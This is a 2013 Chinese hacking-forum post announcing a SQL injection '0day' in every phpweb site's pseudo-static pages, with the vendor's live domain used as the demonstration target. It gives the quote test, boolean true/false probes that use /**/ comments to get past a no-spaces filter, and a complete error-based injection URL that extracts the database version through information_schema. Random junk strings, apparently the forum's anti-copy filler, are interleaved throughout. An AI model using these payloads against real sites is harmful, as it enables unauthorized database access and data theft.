中国网络渗透测试联盟
标题:
phpweb伪静态页面注入0day
[打印本页]
作者:
admin
时间:
2013-1-4 19:46
标题:
phpweb伪静态页面注入0day
phpweb所有的整站程序伪静态页面都存在sql注入
1 o0 L$ A$ L3 D0 L" s
) ]3 | k2 W5 b
主站:
http://phpweb.net/
@ F0 L8 D; @3 b) o
加’检测:
& z/ E* z* \+ Y* W
& O; M( `+ J# x
http://www.phpweb.net/down/html/?772
′.html
, h ]2 q9 b3 f5 z: B- w p4 i9 o7 i# z
: P; @* L) Y1 }3 s
出错
5 E& J8 r8 Z- E. T% Z: k. e) C$ `
存在注入。
1 F' Y% R% ?+ M
不能用空格,只能用/*罗
1 W' v+ a, O4 V) g% V$ k b/ g; {
http://www.phpweb.net/page/html/?56
′/**/and/**/1=1/*.html 正常
. k1 g& u" s% b: }+ q c
: S! R1 b: l- I2 X, F/ c
http://www.phpweb.net/page/html/?56
′/**/and/**/1=2/*.html 出错.
8 i6 S" z8 T( G
爆数据库版本:
! e. W6 y6 e" a A
5 E0 K5 d3 h+ v# L+ e- N$ p P
?
5 o4 r/ A8 [; Z+ r; E+ D
1
8 o8 a2 k% Q2 e1 H
http://www.phpweb.net/page/html/?56'/
**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
7 v2 X$ t8 g; X) `" h% ]
更新日期: 2013-01-03 13:39:50
; C" T8 [. K! [" |
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2